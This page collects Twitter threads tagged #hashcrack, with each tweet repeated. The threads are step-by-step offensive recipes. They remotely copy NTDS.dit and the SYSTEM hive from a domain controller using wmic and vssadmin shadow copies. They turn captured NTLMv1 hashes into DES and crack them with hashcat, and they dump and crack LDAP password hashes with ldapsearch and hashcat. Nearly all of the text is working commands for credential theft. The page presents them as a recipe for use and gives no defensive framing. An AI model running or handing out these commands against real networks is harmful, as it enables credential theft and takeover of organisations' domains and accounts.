Discover and read the best of Twitter Threads about #hashcrack
Most recents (3)
REMOTELY EXTRACT NTDS.DIT & SYSTEM hive
STEP 1: Use ‘wmi’ to execute ‘vssadmin’ to create new volume shadow copy:
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
STEP 1: Use ‘wmi’ to execute ‘vssadmin’ to create new volume shadow copy:
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
STEP 2: Extract ‘ntds.dit’ from the new volume shadow copy:
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
STEP 3: Save off the SYSTEM hive from the registry:
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\sys_backup.hiv 2>&1"
wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\sys_backup.hiv 2>&1"
HOW TO EXTRACT NTLM HASH FROM NTLMv1 HASH:
STEP 1-Capture NTLMv1 hash with or without SSP using responder.
STEP 2-Download NTLMv1-Multi tool
github.com/evilmog/ntlmv1…
python ntlmv1.py --nossp <ntlmv1_hash_nossp>
python ntlmv1-ssp.py --ssp <ntlmv1_hash_ssp>
STEP 1-Capture NTLMv1 hash with or without SSP using responder.
STEP 2-Download NTLMv1-Multi tool
github.com/evilmog/ntlmv1…
python ntlmv1.py --nossp <ntlmv1_hash_nossp>
python ntlmv1-ssp.py --ssp <ntlmv1_hash_ssp>
STEP 3-Add following DES hashes into hashes.txt:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
STEP 4-Load into Hashcat and crack:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
STEP 4-Load into Hashcat and crack:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
STEP 5-Cracked hashes.txt output:
727b4e35f947129e:1122334455667788:$HEX[8923bdfdaf753f63]
a52b9cdedae86934:1122334455667788:$HEX[17d741d7ddc1c36f]
STEP 6-Convert cracked DES into NT:
hashcat.net/wiki/doku.php?…
727b4e35f947129e:1122334455667788:$HEX[8923bdfdaf753f63]
a52b9cdedae86934:1122334455667788:$HEX[17d741d7ddc1c36f]
STEP 6-Convert cracked DES into NT:
hashcat.net/wiki/doku.php?…
(1/3) DUMP LDAP PASSWORD HASHES:
STEP 1: Dump target user hash:
ldapsearch –x –h <LDAP_IPAddr> -D "cn=Directory Manager" -w <password> -b 'uid=<target_username>,cn=users,cn=accounts,dc=<DOMAIN>,dc=COM' uid userpassword krbprincipalkey sambalmpassword sambantpassword
#hashcrack
STEP 1: Dump target user hash:
ldapsearch –x –h <LDAP_IPAddr> -D "cn=Directory Manager" -w <password> -b 'uid=<target_username>,cn=users,cn=accounts,dc=<DOMAIN>,dc=COM' uid userpassword krbprincipalkey sambalmpassword sambantpassword
#hashcrack
(2/3) DUMP LDAP PASSWORD HASHES:
STEP 2: The ‘userpassword::’ and ‘krbprincipalkey::’ hash is base64 encoded and now you need to decode it:
echo 'e1NTSEF9dHZEaUZ4ejJTUkRBLzh1NUZSSGVIT2N4WkZMci9OYktQNHNLNWc9PQ==' | base64 --decode
{SSHA}tvDiFxz2SRDA/8u5FRHeHOcxZFLr/NbKP4sK5g==
STEP 2: The ‘userpassword::’ and ‘krbprincipalkey::’ hash is base64 encoded and now you need to decode it:
echo 'e1NTSEF9dHZEaUZ4ejJTUkRBLzh1NUZSSGVIT2N4WkZMci9OYktQNHNLNWc9PQ==' | base64 --decode
{SSHA}tvDiFxz2SRDA/8u5FRHeHOcxZFLr/NbKP4sK5g==
(3/3) DUMP LDAP PASSWORD HASHES:
STEP 3: Place your decoded hash into hash.txt file and fire up Hashcat mode ‘111’ and attempt to crack the password hash:
hashcat –a 0 –m 111 hash.txt dict.txt
amazon.com/dp/1793458618
#hashcrack
STEP 3: Place your decoded hash into hash.txt file and fire up Hashcat mode ‘111’ and attempt to crack the password hash:
hashcat –a 0 –m 111 hash.txt dict.txt
amazon.com/dp/1793458618
#hashcrack
